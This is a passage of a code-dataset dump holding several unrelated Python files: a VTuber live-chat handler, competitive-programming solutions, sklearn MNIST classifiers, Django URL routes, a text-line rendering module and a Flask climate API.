logging.info(f\"[AI回复{user_name}]:{resp_content}\")\n else:\n resp_content = \"\"\n logging.warning(\"警告:通义千问无返回,请检查配置、网络是否正确,也可能是cookie过期或失效,需要重新获取cookie\")\n elif self.chat_type == \"game\":\n # return\n\n if My_handle.config.get(\"game\", \"enable\"):\n # 传入切分后的弹幕内容\n self.game.parse_keys_and_simulate_keys_press(content.split(), 2)\n\n return\n elif self.chat_type == \"reread\":\n # 调用LLM统一接口,获取返回内容\n resp_content = self.llm_handle(self.chat_type, data_json)\n elif self.chat_type == \"none\":\n # 不启用\n return\n else:\n resp_content = content\n\n # 空数据结束\n if resp_content == \"\" or resp_content is None:\n return\n\n \"\"\"\n 双重过滤,为您保驾护航\n \"\"\"\n resp_content = resp_content.replace('\\n', '。')\n \n # LLM回复的内容进行违禁判断\n if self.prohibitions_handle(resp_content):\n return\n\n # logger.info(\"resp_content=\" + resp_content)\n\n # 将 AI 回复记录到日志文件中\n with open(self.comment_file_path, \"r+\", encoding=\"utf-8\") as f:\n tmp_content = f.read()\n # 将指针移到文件头部位置(此目的是为了让直播中读取日志文件时,可以一直让最新内容显示在顶部)\n f.seek(0, 0)\n # 不过这个实现方式,感觉有点低效\n # 设置单行最大字符数,主要目的用于接入直播弹幕显示时,弹幕过长导致的显示溢出问题\n max_length = 20\n resp_content_substrings = [resp_content[i:i + max_length] for i in range(0, len(resp_content), max_length)]\n resp_content_joined = '\\n'.join(resp_content_substrings)\n\n # 根据 弹幕日志类型进行各类日志写入\n if My_handle.config.get(\"comment_log_type\") == \"问答\":\n f.write(f\"[{user_name} 提问]:\\n{content}\\n[AI回复{user_name}]:{resp_content_joined}\\n\" + tmp_content)\n elif My_handle.config.get(\"comment_log_type\") == \"问题\":\n f.write(f\"[{user_name} 提问]:\\n{content}\\n\" + tmp_content)\n elif My_handle.config.get(\"comment_log_type\") == \"回答\":\n f.write(f\"[AI回复{user_name}]:\\n{resp_content_joined}\\n\" + tmp_content)\n\n # 音频合成时需要用到的重要数据\n message = {\n \"type\": \"comment\",\n \"tts_type\": My_handle.audio_synthesis_type,\n \"data\": My_handle.config.get(My_handle.audio_synthesis_type),\n \"config\": self.filter_config,\n \"user_name\": user_name,\n \"content\": resp_content\n }\n\n # 音频合成(edge-tts / vits_fast)并播放\n My_handle.audio.audio_synthesis(message)\n except Exception as e:\n logging.error(traceback.format_exc())\n\n\n # 礼物处理\n def gift_handle(self, data):\n try:\n # 记录数据库\n if My_handle.config.get(\"database\", \"gift_enable\"):\n insert_data_sql = '''\n INSERT INTO gift (username, gift_name, gift_num, unit_price, total_price, ts) VALUES (?, ?, ?, ?, ?, ?)\n '''\n self.db.execute(insert_data_sql, (\n data['username'], \n data['gift_name'], \n data['num'], \n data['unit_price'], \n data['total_price'],\n datetime.now())\n )\n \n # 违禁处理\n if self.prohibitions_handle(data['username']):\n return\n \n if self.integral_handle(\"gift\", data):\n return\n\n # 合并字符串末尾连续的* 主要针对获取不到用户名的情况\n data['username'] = My_handle.common.merge_consecutive_asterisks(data['username'])\n # 删除用户名中的特殊字符\n data['username'] = My_handle.common.replace_special_characters(data['username'], \"!!@#¥$%^&*_-+/——=()()【】}|{:;<>~`\\\\\") \n\n # logging.debug(f\"[{data['username']}]: {data}\")\n \n if False == self.thanks_config[\"gift_enable\"]:\n return\n\n # 如果礼物总价低于设置的礼物感谢最低值\n if data[\"total_price\"] < self.thanks_config[\"lowest_price\"]:\n return\n\n resp_content = self.thanks_config[\"gift_copy\"].format(username=data[\"username\"], gift_name=data[\"gift_name\"])\n\n message = {\n \"type\": \"gift\",\n \"tts_type\": My_handle.audio_synthesis_type,\n \"data\": My_handle.config.get(My_handle.audio_synthesis_type),\n \"config\": self.filter_config,\n \"user_name\": data[\"username\"],\n \"content\": resp_content\n }\n\n # 音频合成(edge-tts / vits_fast)并播放\n My_handle.audio.audio_synthesis(message)\n except Exception as e:\n logging.error(traceback.format_exc())\n\n\n # 入场处理\n def entrance_handle(self, data):\n try:\n # 记录数据库\n if My_handle.config.get(\"database\", \"entrance_enable\"):\n insert_data_sql = '''\n INSERT INTO entrance (username, ts) VALUES (?, ?)\n '''\n self.db.execute(insert_data_sql, (data['username'], datetime.now()))\n\n # 违禁处理\n if self.prohibitions_handle(data['username']):\n return\n \n if self.integral_handle(\"entrance\", data):\n return\n\n # 合并字符串末尾连续的* 主要针对获取不到用户名的情况\n data['username'] = My_handle.common.merge_consecutive_asterisks(data['username'])\n # 删除用户名中的特殊字符\n data['username'] = My_handle.common.replace_special_characters(data['username'], \"!!@#¥$%^&*_-+/——=()()【】}|{:;<>~`\\\\\")\n\n # logging.debug(f\"[{data['username']}]: {data['content']}\")\n \n if False == self.thanks_config[\"entrance_enable\"]:\n return\n\n resp_content = self.thanks_config[\"entrance_copy\"].format(username=data[\"username\"])\n\n message = {\n \"type\": \"entrance\",\n \"tts_type\": My_handle.audio_synthesis_type,\n \"data\": My_handle.config.get(My_handle.audio_synthesis_type),\n \"config\": self.filter_config,\n \"user_name\": data['username'],\n \"content\": resp_content\n }\n\n # 音频合成(edge-tts / vits_fast)并播放\n My_handle.audio.audio_synthesis(message)\n except Exception as e:\n logging.error(traceback.format_exc())\n\n\n # 关注处理\n def follow_handle(self, data):\n try:\n # 合并字符串末尾连续的* 主要针对获取不到用户名的情况\n data['username'] = My_handle.common.merge_consecutive_asterisks(data['username'])\n # 删除用户名中的特殊字符\n data['username'] = My_handle.common.replace_special_characters(data['username'], \"!!@#¥$%^&*_-+/——=()()【】}|{:;<>~`\\\\\")\n\n # 违禁处理\n if self.prohibitions_handle(data['username']):\n return\n\n # logging.debug(f\"[{data['username']}]: {data['content']}\")\n \n if False == self.thanks_config[\"follow_enable\"]:\n return\n\n resp_content = self.thanks_config[\"follow_copy\"].format(username=data[\"username\"])\n\n message = {\n \"type\": \"follow\",\n \"tts_type\": My_handle.audio_synthesis_type,\n \"data\": My_handle.config.get(My_handle.audio_synthesis_type),\n \"config\": self.filter_config,\n \"user_name\": data['username'],\n \"content\": resp_content\n }\n\n # 音频合成(edge-tts / vits_fast)并播放\n My_handle.audio.audio_synthesis(message)\n except Exception as e:\n logging.error(traceback.format_exc())\n\n # 定时处理\n def schedule_handle(self, data):\n try:\n content = data[\"content\"]\n\n message = {\n \"type\": \"entrance\",\n \"tts_type\": My_handle.audio_synthesis_type,\n \"data\": My_handle.config.get(My_handle.audio_synthesis_type),\n \"config\": self.filter_config,\n \"user_name\": data['username'],\n \"content\": content\n }\n\n # 音频合成(edge-tts / vits_fast)并播放\n My_handle.audio.audio_synthesis(message)\n except Exception as e:\n logging.error(traceback.format_exc())\n\n\n \"\"\"\n 数据丢弃部分\n 增加新的处理事件时,需要进行这块部分的内容追加\n \"\"\"\n def process_data(self, data, timer_flag):\n with self.data_lock:\n if timer_flag not in self.timers or not self.timers[timer_flag].is_alive():\n self.timers[timer_flag] = threading.Timer(self.get_interval(timer_flag), self.process_last_data, args=(timer_flag,))\n self.timers[timer_flag].start()\n\n # self.timers[timer_flag].last_data = data\n if hasattr(self.timers[timer_flag], 'last_data'):\n self.timers[timer_flag].last_data.append(data)\n # 这里需要注意配置命名!!!\n if len(self.timers[timer_flag].last_data) > int(My_handle.config.get(\"filter\", timer_flag + \"_forget_reserve_num\")):\n self.timers[timer_flag].last_data.pop(0)\n else:\n self.timers[timer_flag].last_data = [data]\n\n def process_last_data(self, timer_flag):\n with self.data_lock:\n timer = self.timers.get(timer_flag)\n if timer and timer.last_data is not None and timer.last_data != []:\n logging.debug(f\"预处理定时器触发 type={timer_flag},data={timer.last_data}\")\n\n if timer_flag == \"comment\":\n for data in timer.last_data:\n self.comment_handle(data)\n elif timer_flag == \"gift\":\n for data in timer.last_data:\n self.gift_handle(data)\n #self.gift_handle(timer.last_data)\n elif timer_flag == \"entrance\":\n for data in timer.last_data:\n self.entrance_handle(data)\n #self.entrance_handle(timer.last_data)\n elif timer_flag == \"follow\":\n for data in timer.last_data:\n self.follow_handle(data)\n elif timer_flag == \"talk\":\n # 聊天暂时共用弹幕处理逻辑\n for data in timer.last_data:\n self.comment_handle(data)\n #self.comment_handle(timer.last_data)\n elif timer_flag == \"schedule\":\n # 定时任务处理\n for data in timer.last_data:\n self.schedule_handle(data)\n #self.schedule_handle(timer.last_data)\n\n # 清空数据\n timer.last_data = []\n\n def get_interval(self, timer_flag):\n # 根据标志定义不同计时器的间隔\n intervals = {\n \"comment\": My_handle.config.get(\"filter\", \"comment_forget_duration\"),\n \"gift\": My_handle.config.get(\"filter\", \"gift_forget_duration\"),\n \"entrance\": My_handle.config.get(\"filter\", \"entrance_forget_duration\"),\n \"follow\": My_handle.config.get(\"filter\", \"follow_forget_duration\"),\n \"talk\": My_handle.config.get(\"filter\", \"talk_forget_duration\"),\n \"schedule\": My_handle.config.get(\"filter\", \"schedule_forget_duration\")\n # 根据需要添加更多计时器及其间隔,记得添加config.json中的配置项\n }\n\n # 默认间隔为0.1秒\n return intervals.get(timer_flag, 0.1)\n","repo_name":"Jacobs12/EWVtuber","sub_path":"Tools/my_handle.py","file_name":"my_handle.py","file_ext":"py","file_size_in_byte":83850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"9578604264","text":"import math\nk=input(\"enter the number of cycle:\")\nl=int(k)\nw=0\nlist=[]\nwhile w exponent:\n break\n print(S)\n toc()\n exit()\n","repo_name":"data-flux/project-euler","sub_path":"projecteuler063.py","file_name":"projecteuler063.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"73645435982","text":"n, k = map(int, input().split())\np = [int(i) - 1 for i in input().split()]\nc = [int(i) for i in input().split()]\n\nchecked = [False] * n\n\nans = -10 ** 10\nfor i in range(n):\n if checked[i]:\n continue\n loop = []\n nxt = i\n while not checked[nxt]:\n checked[nxt] = True\n loop.append(c[nxt])\n nxt = p[nxt]\n\n L = len(loop)\n\n for start in range(L):\n s = 0\n dist = 0\n for end in range(start+1, start+L):\n dist += 1\n end %= L\n s += loop[end]\n ans = max(ans, s + max(0, sum(loop) * (k - dist) // L))\n\nprint(ans)\n","repo_name":"snhr-1019/competitive-programming","sub_path":"AtCoder/abc175/d/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"29428184200","text":"import colorlog\nfrom colorlog import ColoredFormatter\n\nhandler = colorlog.StreamHandler() # type: ignore\n\nformatter = ColoredFormatter(\n \"%(log_color)s%(levelname)-8s%(reset)s %(blue)s%(message)s\",\n datefmt=None,\n reset=True,\n log_colors={\n \"DEBUG\": \"cyan\",\n \"INFO\": \"green\",\n \"WARNING\": \"yellow\",\n \"ERROR\": \"red\",\n \"CRITICAL\": \"red,bg_white\",\n },\n secondary_log_colors={},\n style=\"%\",\n)\n\n\nlogger = colorlog.getLogger(__name__)\nlogger.addHandler(handler)\n\nhandler.setFormatter(\n colorlog.ColoredFormatter(\n \"%(log_color)s%(levelname)-8s%(reset)s %(white)s%(message)s\",\n datefmt=None,\n reset=True,\n log_colors={\n \"DEBUG\": \"red\",\n \"INFO\": \"green\",\n \"WARNING\": \"yellow\",\n \"ERROR\": \"red\",\n \"CRITICAL\": \"red,bg_white\",\n },\n secondary_log_colors={},\n style=\"%\",\n )\n)\nlogger.setLevel(\"DEBUG\")\n","repo_name":"mohseneptune/todos-fastapi","sub_path":"src/infrastructure/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":953,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"27465772712","text":"class Solution:\n def groupAnagrams(self, strs: List[str]) -> List[List[str]]:\n anagrams = collections.defaultdict(list)\n \n for word in strs:\n sorted_word = ''.join(sorted(word))\n anagrams[sorted_word] += [word]\n \n \n return list(anagrams.values())\n \n \n \n\n \n \n ","repo_name":"jongheonleee/Leetcode","sub_path":"49-group-anagrams/49-group-anagrams.py","file_name":"49-group-anagrams.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"41196197082","text":"import os\n\nos.chdir('C:/Users/Asus')\n\nfinput = open(\"TESTINGSIR.txt\",\"r\") \noutput = open(\"pro.txt\",\"w\")\n\ncount = 0\nfor line in finput :\n count = count+1\n output.write (\"{:2d} {}\".format(count,line))","repo_name":"Andrean2305/Tugas-Sir-Jude-AandP","sub_path":"input file from another file.py","file_name":"input file from another file.py","file_ext":"py","file_size_in_byte":212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"15374825273","text":"# -*- coding: utf-8 -*-\r\n\r\n#import sys\r\n#import os\r\nimport time\r\nfrom sklearn import metrics\r\nimport numpy as np\r\nimport pickle\r\nimport kreadmnist \r\n\r\n\r\n\r\n'''\r\n classifiers = {'NB':naive_bayes_classifier, #快\r\n 'KNN':knn_classifier, #慢\r\n 'LR':logistic_regression_classifier, #慢\r\n 'RF':random_forest_classifier, #快\r\n 'DT':decision_tree_classifier, #快\r\n 'SVM':svm_classifier,#慢\r\n 'GBDT':gradient_boosting_classifier, #慢\r\n 'AB':AdaBoost_classifier,\r\n 'NN':Neural_Network_classifier\r\n }\r\n'''\r\n \r\n# Multinomial Naive Bayes Classifier朴素贝叶斯\r\ndef naive_bayes_classifier(train_x, train_y):\r\n from sklearn.naive_bayes import MultinomialNB\r\n model = MultinomialNB(alpha=0.01)\r\n model.fit(train_x, train_y)\r\n return model\r\n \r\n \r\n# KNN Classifier K近邻\r\n#class sklearn.neighbors.KNeighborsClassifier(n_neighbors=5, \r\n#weights=’uniform’, algorithm=’auto’, leaf_size=30, p=2, \r\n#metric=’minkowski’, metric_params=None, n_jobs=1, **kwargs)\r\n#优点\r\n#1.简单,易于理解,易于实现,无需估计参数,无需训练;\r\n#2. 适合对稀有事件进行分类;\r\n#3.特别适合于多分类问题(multi-modal,对象具有多个类别标签), kNN比SVM的表现要好。\r\n#缺点\r\n#数据量大时不可行,计算量大等等\r\ndef knn_classifier(train_x, train_y):\r\n from sklearn.neighbors import KNeighborsClassifier\r\n model = KNeighborsClassifier()\r\n model.fit(train_x, train_y)\r\n return model\r\n \r\n \r\n# Logistic Regression Classifier 逻辑回归\r\ndef logistic_regression_classifier(train_x, train_y):\r\n from sklearn.linear_model import LogisticRegression\r\n model = LogisticRegression(penalty='l2')\r\n model.fit(train_x, train_y)\r\n return model\r\n \r\n \r\n# Random Forest Classifier 随机森林\r\ndef random_forest_classifier(train_x, train_y):\r\n from sklearn.ensemble import RandomForestClassifier\r\n model = RandomForestClassifier(n_estimators=100)\r\n model.fit(train_x, train_y)\r\n return model\r\n \r\n \r\n# Decision Tree Classifier 决策树\r\ndef decision_tree_classifier(train_x, train_y):\r\n from sklearn import tree\r\n model = tree.DecisionTreeClassifier()\r\n model.fit(train_x, train_y)\r\n return model\r\n \r\n \r\n# GBDT(Gradient Boosting Decision Tree) Classifier 迭代决策树\r\ndef gradient_boosting_classifier(train_x, train_y):\r\n from sklearn.ensemble import GradientBoostingClassifier\r\n model = GradientBoostingClassifier(n_estimators=200)\r\n model.fit(train_x, train_y)\r\n return model\r\n\r\n\r\n\r\n# AdaBoost \r\ndef AdaBoost_classifier(train_x,train_y):\r\n from sklearn.ensemble import AdaBoostClassifier\r\n model=AdaBoostClassifier(n_estimators=200)\r\n model.fit(train_x,train_y)\r\n return model\r\n \r\n# SVM Classifier SVM,支持向量机\r\n#class sklearn.svm.SVC(C=1.0, kernel=’rbf’, degree=3, gamma=’auto’,\r\n#coef0=0.0, shrinking=True, probability=False,tol=0.001, \r\n#cache_size=200, class_weight=None, verbose=False, max_iter=-1, \r\n#decision_function_shape=’ovr’, random_state=None)[source]\r\n#优点\r\n#二分类效果相当好\r\n#缺点\r\n#数据量大时不可行,计算量大,算法复杂,多分类表现一般等等\r\ndef svm_classifier(train_x, train_y):\r\n from sklearn.svm import SVC\r\n model = SVC(kernel='rbf', probability=True)\r\n model.fit(train_x, train_y)\r\n return model\r\n\r\n# Neural_Network MLP\r\ndef Neural_Network_classifier(train_x,train_y):\r\n from sklearn.neural_network import MLPClassifier\r\n model=MLPClassifier()\r\n model.fit(train_x,train_y)\r\n return model\r\n\r\n \r\nif __name__ == '__main__':\r\n thresh = 0.5\r\n model_save_file = None #如果想要保存训练好的模型,就加个名字上去\r\n model_save = {}\r\n '''\r\n 全部一起计算会花销大量的时间,所以建议修改后,单个计算,单个记录\r\n 如下\r\n '''\r\n test_classifiers = ['RF']\r\n classifiers = {\r\n 'RF':random_forest_classifier\r\n }\r\n #计算时间\r\n# test_classifiers = ['NB', 'KNN', 'LR', 'RF', 'DT', 'SVM', 'GBDT','AB']\r\n# classifiers = {'NB':naive_bayes_classifier, #快\r\n# 'KNN':knn_classifier, #慢\r\n# 'LR':logistic_regression_classifier, #慢\r\n# 'RF':random_forest_classifier, #快\r\n# 'DT':decision_tree_classifier, #快\r\n# 'SVM':svm_classifier,#慢\r\n# 'GBDT':gradient_boosting_classifier, #慢\r\n# 'AB':AdaBoost_classifier,\r\n# 'NN':Neural_Network_classifier\r\n# }\r\n print('正在读取训练数据集和测试数据集......')\r\n train_x, train_y, test_x, test_y = kreadmnist.read_data()\r\n \r\n# #PCA\r\n# from sklearn.decomposition import PCA\r\n# estimator=PCA(n_components=700)\r\n# \r\n# train_x=estimator.fit_transform(train_x)\r\n# test_x=estimator.fit_transform(test_x)\r\n \r\n #以下是截取一小部分的数据进行测试,检测算法是否运行\r\n# train_x= train_x[0:1000]\r\n# train_y= train_y[0:1000]\r\n# test_x= test_x[0:50]\r\n# test_y =test_y[0:50]\r\n# \r\n print(train_x.shape)\r\n #训练集合测试集的数量,数据向量的维度\r\n num_train, num_feat = train_x.shape\r\n num_test, num_feat = test_x.shape\r\n is_binary_class = (len(np.unique(train_y)) == 2)\r\n print('******************** 数据的信息 *********************')\r\n #training data: %d, #testing_data: %d, dimension:\r\n print('#训练数据集: %d, #测试数据集: %d, 数据的维度: %d' % (num_train, num_test, num_feat))\r\n \r\n for classifier in test_classifiers:\r\n print('******************* %s ********************' % classifier)\r\n start_time = time.time()\r\n model = classifiers[classifier](train_x, train_y)\r\n print('training took %fs!' % (time.time() - start_time))\r\n \r\n predict = model.predict(test_x)\r\n if model_save_file != None:\r\n model_save[classifier] = model\r\n if is_binary_class:\r\n precision = metrics.precision_score(test_y, predict)\r\n recall = metrics.recall_score(test_y, predict)\r\n print('precision: %.2f%%, recall: %.2f%%' % (100 * precision, 100 * recall))\r\n \r\n '''----------------------------------------'''\r\n '''下面的循环主要作用是看第几个有错误,同时看进行检验的过程'''\r\n# for i in range(len(predict)):\r\n# if predict[i]==test_y[i]:\r\n# print(\"第{}个正确\".format(i))\r\n# else:\r\n# print(\"第{}个错误\".format(i))\r\n '''---------------------------------------'''\r\n \r\n ''' accuracy是sklearn自带的方法 '''\r\n accuracy = metrics.accuracy_score(test_y, predict)\r\n print('{} accuracy: {}%'.format(classifier,100 * accuracy))\r\n #如果model_save_file没有设置,下面语句将不会执行,即训练出来的模型不保存\r\n if model_save_file != None:\r\n pickle.dump(model_save, open(model_save_file, 'wb'))\r\n\r\n\r\n","repo_name":"AlphaKong/MLtest","sub_path":"mnistclassifier.py","file_name":"mnistclassifier.py","file_ext":"py","file_size_in_byte":7163,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"29506977079","text":"from sklearn.externals import joblib\r\nimport matplotlib.image as mimage\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\nfrom docx import Document\r\n\r\nfilename = r'C:\\Users\\HRUNN\\Desktop\\DevanagariHandwrittenCharacterDataset\\First programs\\englishdigitclass.pkl'\r\nclassifier = joblib.load(filename)\r\ndata_test = np.zeros((1, 196))\r\ncount = 0\r\ndocument = Document()\r\nwhile True:\r\n path = r'C:\\Users\\HRUNN\\Desktop\\DevanagariHandwrittenCharacterDataset\\1.png'\r\n im = mimage.imread(path)\r\n im = im[:, :, 0]\r\n plt.imshow(im)\r\n plt.show()\r\n for i in range(0, 26, 2):\r\n for j in range(0, 26, 2):\r\n data_test[0, count] = im[i, j] + im[i + 1, j] + im[i, j + 1] + im[i + 1, j + 1]\r\n count = count + 1\r\n count = 0\r\n output = classifier.predict(data_test)\r\n document.add_paragraph(str(output))\r\n document.save('English.docx')\r\n plt.subplot(2, 1, 1)\r\n plt.imshow(im)\r\n plt.subplot(2, 1, 2)\r\n path2 = r'C:\\Users\\HRUNN\\Desktop\\DevanagariHandwrittenCharacterDataset\\training\\%d\\(1).png' % output\r\n im1 = mimage.imread(path2)\r\n plt.imshow(im1)\r\n plt.show()\r\n","repo_name":"srinivas-kini/OCR-neural-nets","sub_path":"HRUNN/Latin/latin_digits.py","file_name":"latin_digits.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"38587814516","text":"\"\"\"oauau URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.8/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Add an import: from blog import urls as blog_urls\n 2. Add a URL to urlpatterns: url(r'^blog/', include(blog_urls))\n\"\"\"\nfrom django.conf.urls import include, url\nfrom django.contrib import admin\nfrom django.contrib.sitemaps.views import sitemap\nfrom django.views.generic import TemplateView\n\nfrom .newsletter.views import WorkbookView, WorkbookConfirmationView, \\\n LandingPageView, LaunchConfirmationView\nfrom .sitemap import OauauSitemap\n\n\nsitemaps = {\n 'static': OauauSitemap,\n}\n\nurlpatterns = [\n url(r'^admin/', include(admin.site.urls)),\n url(r'^$', LandingPageView.as_view(), name='landing_page'),\n url(r'^googlec22a1c650e0dd9ea.html$',\n TemplateView.as_view(template_name='googlec22a1c650e0dd9ea.html')),\n url(r'^sitemap\\.xml$', sitemap, {'sitemaps': sitemaps},\n name='django.contrib.sitemaps.views.sitemap'),\n url(r'^confirmacao/$', LaunchConfirmationView.as_view(),\n name='launch_confirmation'),\n url(r'^livro-de-atividades-vogais/$',\n WorkbookView.as_view(), name='workbook'),\n url(r'^livro-de-atividades-vogais/download/$',\n WorkbookConfirmationView.as_view(), name='workbook_confirmation'),\n]\n","repo_name":"rogerhil/oauau","sub_path":"src/oauau/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"18631589527","text":"# TODO retrieve attributes of any (x, y) coordinates\n# TODO retrieve attributes of closest existing line (by y coordinate)\n# TODO use ulen and unicode string splitting\n\nimport collections\nfrom typing import Any, Deque, Iterator, List, Optional, Set, Tuple\n\nfrom .markup import AT, Attributes\n\n__all__ = [\"Line\", \"AttributedLines\"]\n\nLine = Tuple[Attributes, AT]\n\nclass AttributedLines:\n \"\"\"\n AttributedLines is a list of lines of AttributedText that maintains a\n vertical offset.\n\n When rendering a tree of messages, the RenderedMessage-s are drawn line by\n line to an AttributedLines. The AttributedLines is then displayed in an\n AttributedLinesWidget.\n\n Multiple AttributedLines can be concatenated, keeping either the first or\n the second AttributedLines's offset.\n \"\"\"\n\n def __init__(self, lines: Optional[List[Line]] = None) -> None:\n self.upper_offset = 0\n self._lines: Deque[Line] = collections.deque(lines or [])\n\n def __iter__(self) -> Iterator[Line]:\n return self._lines.__iter__()\n\n def __len__(self) -> int:\n return len(self._lines)\n\n @property\n def lower_offset(self) -> int:\n # When there's one element in the list, the lower and upper offsets are\n # the same. From that follows that in an empty list, the lower offset\n # must be smaller than the upper offset.\n return self.upper_offset + (len(self) - 1)\n\n @lower_offset.setter\n def lower_offset(self, lower_offset: int) -> None:\n self.upper_offset = lower_offset - (len(self) - 1)\n\n # Modifying functions\n\n def append_above(self,\n attributes: Attributes,\n text: AT,\n ) -> None:\n \"\"\"\n Append a line above all already existing lines. The existing lines'\n offsets do not change.\n \"\"\"\n\n self._lines.appendleft((attributes, text))\n self.upper_offset -= 1\n\n def append_below(self,\n attributes: Attributes,\n text: AT,\n ) -> None:\n \"\"\"\n Append a line below all already existing lines. The existing lines'\n offsets do not change.\n \"\"\"\n\n self._lines.append((attributes, text))\n # lower offset does not need to be modified since it's calculated based\n # on the upper offset\n\n def extend_above(self, lines: \"AttributedLines\") -> None:\n \"\"\"\n Prepend an AttributedLines, ignoring its offsets and using the current\n AttributedLines's offsets instead.\n \"\"\"\n\n self._lines.extendleft(reversed(lines._lines))\n self.upper_offset -= len(lines)\n\n def extend_below(self, lines: \"AttributedLines\") -> None:\n \"\"\"\n Append an AttributedLines, ignoring its offsets and using the current\n AttributedLines's offsets instead.\n \"\"\"\n\n self._lines.extend(lines._lines)\n # lower offset does not need to be modified since it's calculated based\n # on the upper offset\n\n # Non-modifying functions\n\n def between(self, start_offset: int, end_offset: int) -> \"AttributedLines\":\n \"\"\"\n Returns a new AttributedLines object containing only the lines between\n (and including) start_offset and end_offset.\n \"\"\"\n\n lines = []\n\n for i, line in enumerate(self):\n line_offset = self.upper_offset + i\n if start_offset <= line_offset <= end_offset:\n lines.append(line)\n\n attr_lines = AttributedLines(lines)\n attr_lines.upper_offset = max(start_offset, self.upper_offset)\n attr_lines.lower_offset = min(end_offset, self.lower_offset)\n return attr_lines\n\n def to_size(self, start_offset: int, end_offset: int) -> \"AttributedLines\":\n \"\"\"\n Same as between(), but fills the AttributedLines with empty lines where\n necessary so that the new upper_offset is the start_offset and the new\n lower_offset is the end_offset.\n \"\"\"\n\n between = self.between(start_offset, end_offset)\n\n while between.upper_offset > start_offset:\n between.append_above({}, AT())\n\n while between.lower_offset < end_offset:\n between.append_below({}, AT())\n\n return between\n\n @staticmethod\n def render_line(\n line: Line,\n width: int,\n horizontal_offset: int,\n offset_char: str = \" \",\n overlap_char: str = \"…\",\n ) -> AT:\n \"\"\"\n Renders a single line to a specified width with a specified horizontal\n offset, applying all line-wide attributes to the result. The length of\n the resulting line is exactly the specified width.\n\n The offset_char is used to pad the line if it is shorter than required.\n\n The overlap_char is used to mark the lines that extend beyond the right\n edge of the widget.\n \"\"\"\n\n attributes, text = line\n # column to the right is reserved for the overlap char\n text_width = width - 1\n\n start_offset = horizontal_offset\n end_offset = start_offset + text_width\n\n result: AT = AT()\n\n if start_offset < 0:\n pad_length = min(text_width, -start_offset)\n result += AT(offset_char * pad_length)\n\n if end_offset < 0:\n pass # the text should not be displayed at all\n elif end_offset < len(text):\n if start_offset > 0:\n result += text[start_offset:end_offset]\n else:\n result += text[:end_offset]\n else:\n if start_offset > 0:\n result += text[start_offset:]\n else:\n result += text\n\n if end_offset > len(text):\n pad_length = min(text_width, end_offset - len(text))\n result += AT(offset_char * pad_length)\n\n if end_offset < len(text):\n result += AT(overlap_char)\n else:\n result += AT(offset_char)\n\n for k, v in attributes.items():\n result = result.set(k, v)\n\n return result\n\n def render_lines(self,\n width: int,\n height: int,\n horizontal_offset: int,\n ) -> List[AT]:\n \"\"\"\n Renders all lines individually.\n \"\"\"\n\n lines = []\n\n for line in self.to_size(0, height - 1):\n lines.append(self.render_line(line, width, horizontal_offset))\n\n return lines\n\n def render(self,\n width: int,\n height: int,\n horizontal_offset: int,\n ) -> AT:\n \"\"\"\n Renders all lines and combines them into a single AttributedText by\n joining them with a newline.\n \"\"\"\n\n lines = self.render_lines(width, height,\n horizontal_offset=horizontal_offset)\n return AT(\"\\n\").join(lines)\n\n def all_values(self, attribute: str) -> Set[Any]:\n values = set()\n\n for attributes, _ in self._lines:\n if attribute in attributes:\n values.add(attributes.get(attribute))\n\n return values\n","repo_name":"Garmelon/bowl","sub_path":"bowl/attributed_lines.py","file_name":"attributed_lines.py","file_ext":"py","file_size_in_byte":7066,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"21724688718","text":"# Dependencies\n\nimport datetime as dt\nimport numpy as np\nimport pandas as pd\n\nimport sqlalchemy\nfrom sqlalchemy.ext.automap import automap_base\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy import create_engine, func\n\nfrom flask import Flask, jsonify\n\n# Database Setup\nengine = create_engine(\"sqlite:///hawaii.sqlite\")\n\n# Reflect an existing database into a new model\nBase = automap_base()\n\n# Reflect the tables\nBase.prepare(engine, reflect=True)\n\n# Save reference to the table\nMeasurement = Base.classes.measurement\nStation = Base.classes.station\n\n# Create session\nsession = Session(engine)\n\n# Flask setup\napp = Flask(__name__)\n\n# Flask Routes\n@app.route(\"/\")\ndef welcome():\n\n return(\n\n f\"Available Routes:

\"\n f\"/api/v1.0/precipitation

\"\n f\"/api/v1.0/stations

\"\n f\"/api/v1.0/tobs

\"\n f\"/api/v1.0/yyyy-mm-dd/
\"\n f\"(Dates range from 2010-01-01 to 2017-08-23).

\" \n f\"/api/v1.0/yyyy-mm-dd/yyyy-mm-dd/
\"\n f\"(Dates range from 2010-01-01 to 2017-08-23).

